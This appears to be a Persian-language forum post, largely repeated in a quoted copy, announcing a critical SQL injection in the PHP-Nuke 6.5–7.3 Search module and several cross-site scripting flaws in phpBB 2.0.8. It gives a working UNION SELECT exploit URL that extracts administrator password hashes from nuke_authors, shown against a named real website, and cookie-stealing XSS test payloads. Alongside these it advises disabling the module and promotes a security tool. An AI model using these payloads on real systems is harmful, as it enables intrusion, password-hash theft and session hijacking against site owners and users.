amirfigo_62
Member
جديترين باگ در PHPNUKE
نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3
درجه : critical
نويسنده : Janek Vind
در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD5 مدير سايت را به نفوذگر ميدهد
كد اكسپلويت :
مثال :
http://www.dailywireless.org/module...LECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد
دريافت سيستم امنيتي مشهدتيم :www.mashhadteam.com/dn/nukehackertrap.rar
بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد
همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از:
و
و
------------------
عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد
www.MashhadTeam.com
نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3
درجه : critical
نويسنده : Janek Vind
در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD5 مدير سايت را به نفوذگر ميدهد
كد اكسپلويت :
کد:
modules.php?name=Search&type=comments&
query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
http://www.dailywireless.org/module...LECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد
دريافت سيستم امنيتي مشهدتيم :www.mashhadteam.com/dn/nukehackertrap.rar
بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد
همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از:
کد:
http://localhost/phpbb208/faq.php?
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir
کد:
http://localhost/phpbb208/faq.php?mode=bbcode&
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir
کد:
http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&category_rows[0][cat_title]=amir<script>alert(document.cookie);</script>
&category_rows[0][cat_order]=99
------------------
عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد
www.MashhadTeam.com